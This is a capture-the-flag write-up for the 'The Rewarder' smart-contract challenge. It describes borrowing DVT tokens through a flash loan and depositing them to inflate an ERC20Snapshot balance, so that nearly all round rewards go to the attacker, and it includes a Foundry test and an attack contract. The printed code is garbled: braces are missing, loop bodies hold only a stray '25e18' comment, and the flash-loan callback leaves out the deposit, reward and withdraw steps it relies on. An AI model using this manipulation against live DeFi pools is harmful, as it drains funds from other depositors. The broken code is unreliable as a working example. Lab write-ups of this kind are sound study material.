The Rewarder


There's a pool offering rewards in tokens every 5 days for those who deposit their DVT tokens into it.
Alice, Bob, Charlie and David have already deposited some DVT tokens, and have won their rewards!
You don't have any DVT tokens. But in the upcoming round, you must claim most rewards for yourself.
By the way, rumours say a new pool has just launched. Isn’t it offering flash loans of DVT tokens?


distributeRewards() computes reward based on ERC20Snapshot. We can borrow large amount of flashloan and deposit into the contract to trigger the snapshot, then get a huge amount of reward tokens, a lot more than we deserve.

Code Audit

This chall is about ERC20 snapshot. Read this article to learn background knowledge:
Obviously we can manipulate something using flashloan and ERC20Snapshot plays a role in this chall. There are 3 tokens in the system:
  • dvt - liquidity token -> the token of flashloan pool
  • accounting token -> the token for governance
  • reward token -> the token when calling TheRewarderPool.distributeRewards()
In the test file:
for (uint8 i; i < 4; i++) {
25e18 // Each depositor gets 25 reward tokens
The theRewarderPool.distributeRewards() call will trigger _recordSnapshot():
function _recordSnapshot() private {
lastSnapshotIdForRewards = accToken.snapshot();
lastRecordedSnapshotTimestamp = block.timestamp;
The lastRecordedSnapshotTimestamp variable influences the isNewRewardsRound() check:
function isNewRewardsRound() public view returns (bool) {
return block.timestamp >= lastRecordedSnapshotTimestamp + REWARDS_ROUND_MIN_DURATION;
So we have to vm.warp() 5 days forward before calling deposit():
function deposit(uint256 amountToDeposit) external {
if (amountToDeposit == 0) revert MustDepositTokens();
accToken.mint(msg.sender, amountToDeposit);
if (!liquidityToken.transferFrom(msg.sender, address(this), amountToDeposit)) revert TransferFail();
You can see that if we deposit a lot of dvt (borrowed via flashloan), we get many accounting tokens with 1:1 ratio. Then distributeRewards() is called:
function distributeRewards() public returns (uint256) {
uint256 rewards = 0;
if (isNewRewardsRound()) {
uint256 totalDeposits = accToken.totalSupplyAt(lastSnapshotIdForRewards);
uint256 amountDeposited = accToken.balanceOfAt(msg.sender, lastSnapshotIdForRewards);
if (amountDeposited > 0 && totalDeposits > 0) {
rewards = (amountDeposited * 100 * 10 ** 18) / totalDeposits;
if (rewards > 0 && !_hasRetrievedReward(msg.sender)) {
rewardToken.mint(msg.sender, rewards);
lastRewardTimestamps[msg.sender] = block.timestamp;
return rewards;
Since our accounting token balance is high, we get a lot of reward tokens here. After that we can just withdraw everything and pay back the flashloan.

Building PoC

// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
import {Utilities} from "../../utils/Utilities.sol";
import "forge-std/Test.sol";
import {DamnValuableToken} from "../../../src/Contracts/DamnValuableToken.sol";
import {TheRewarderPool} from "../../../src/Contracts/the-rewarder/TheRewarderPool.sol";
import {RewardToken} from "../../../src/Contracts/the-rewarder/RewardToken.sol";
import {AccountingToken} from "../../../src/Contracts/the-rewarder/AccountingToken.sol";
import {FlashLoanerPool} from "../../../src/Contracts/the-rewarder/FlashLoanerPool.sol";
contract TheRewarder is Test {
uint256 internal constant TOKENS_IN_LENDER_POOL = 1_000_000e18;
uint256 internal constant USER_DEPOSIT = 100e18;
Utilities internal utils;
FlashLoanerPool internal flashLoanerPool;
TheRewarderPool internal theRewarderPool;
DamnValuableToken internal dvt;
address payable[] internal users;
address payable internal attacker;
address payable internal alice;
address payable internal bob;
address payable internal charlie;
address payable internal david;
function setUp() public {
utils = new Utilities();
users = utils.createUsers(5);
alice = users[0];
bob = users[1];
charlie = users[2];
david = users[3];
attacker = users[4];
vm.label(alice, "Alice");
vm.label(bob, "Bob");
vm.label(charlie, "Charlie");
vm.label(david, "David");
vm.label(attacker, "Attacker");
dvt = new DamnValuableToken();
vm.label(address(dvt), "DVT");
flashLoanerPool = new FlashLoanerPool(address(dvt));
vm.label(address(flashLoanerPool), "Flash Loaner Pool");
// Set initial token balance of the pool offering flash loans
dvt.transfer(address(flashLoanerPool), TOKENS_IN_LENDER_POOL);
theRewarderPool = new TheRewarderPool(address(dvt));
// Alice, Bob, Charlie and David deposit 100 tokens each
for (uint8 i; i < 4; i++) {
dvt.transfer(users[i], USER_DEPOSIT);
dvt.approve(address(theRewarderPool), USER_DEPOSIT);
assertEq(theRewarderPool.accToken().balanceOf(users[i]), USER_DEPOSIT);
assertEq(theRewarderPool.accToken().totalSupply(), USER_DEPOSIT * 4);
assertEq(theRewarderPool.rewardToken().totalSupply(), 0);
// Advance time 5 days so that depositors can get rewards
vm.warp(block.timestamp + 5 days); // 5 days
for (uint8 i; i < 4; i++) {
25e18 // Each depositor gets 25 reward tokens
assertEq(theRewarderPool.rewardToken().totalSupply(), 100e18);
assertEq(dvt.balanceOf(attacker), 0); // Attacker starts with zero DVT tokens in balance
assertEq(theRewarderPool.roundNumber(), 2); // Two rounds should have occurred so far
console.log(unicode"🧨 Let's see if you can break it... 🧨");
function testExploit() public {
vm.warp(block.timestamp + 5 days);
AttackContract attackContract = new AttackContract(flashLoanerPool, theRewarderPool);
console.log(unicode"\n🎉 Congratulations, you can go to the next level! 🎉");
function validation() internal {
assertEq(theRewarderPool.roundNumber(), 3); // Only one round should have taken place
for (uint8 i; i < 4; i++) {
// Users should get negligible rewards this round
uint256 rewardPerUser = theRewarderPool.rewardToken().balanceOf(users[i]);
uint256 delta = rewardPerUser - 25e18;
assertLt(delta, 1e16);
// Rewards must have been issued to the attacker account
assertGt(theRewarderPool.rewardToken().totalSupply(), 100e18);
uint256 rewardAttacker = theRewarderPool.rewardToken().balanceOf(attacker);
// The amount of rewards earned should be really close to 100 tokens
uint256 deltaAttacker = 100e18 - rewardAttacker;
assertLt(deltaAttacker, 1e17);
// Attacker finishes with zero DVT tokens in balance
assertEq(dvt.balanceOf(attacker), 0);
contract AttackContract {
FlashLoanerPool public flashLoanerPool;
TheRewarderPool public theRewarderPool;
DamnValuableToken public dvt;
RewardToken public rewardToken;
address public owner;
constructor(FlashLoanerPool _flashLoanerPool, TheRewarderPool _theRewarderPool) {
flashLoanerPool = _flashLoanerPool;
theRewarderPool = _theRewarderPool;
dvt = theRewarderPool.liquidityToken();
rewardToken = theRewarderPool.rewardToken();
owner = msg.sender;
function pwn() external {
rewardToken.transfer(owner, rewardToken.balanceOf(address(this)));
function receiveFlashLoan(uint256 amount) external {
dvt.approve(address(theRewarderPool), type(uint256).max);
// Pay back flashloan
dvt.transfer(address(flashLoanerPool), amount);